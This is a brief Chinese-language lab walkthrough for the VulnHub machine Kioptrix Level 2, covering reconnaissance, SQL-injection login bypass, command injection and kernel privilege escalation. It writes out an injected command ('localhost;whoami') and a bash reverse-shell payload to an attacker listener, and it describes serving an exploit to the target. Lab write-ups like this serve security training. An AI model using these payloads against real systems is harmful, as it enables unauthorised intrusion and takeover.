主機來源:www.vulnhub.com
下載地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar
發現IP
安裝成功後,查找此虛擬機的IP,我使用的是netdiscover
netdiscover -i eth0 -r 172.21.137.0/24
找到IP爲:172.21.137.47
端口掃描
首先去看看80端口
SQL注入
使用萬能密碼直接登錄
命令執行
經典的命令執行
直接分號銜接命令
localhost;whoami
反彈shell
localhost;bash -i >& /dev/tcp/172.21.137.69/8080 0>&1
遠程服務器開啓監聽
彈回shell
但權限不夠
提權
我們看下內核版本
uname -a
可以直接用linux2.6的提權
首先自己下下來exp
然後讓靶機下載(不直接讓靶機下的原因是ssl有問題)
開啓http服務
python -m SimpleHTTPServer 9090
下載
編譯
執行
結束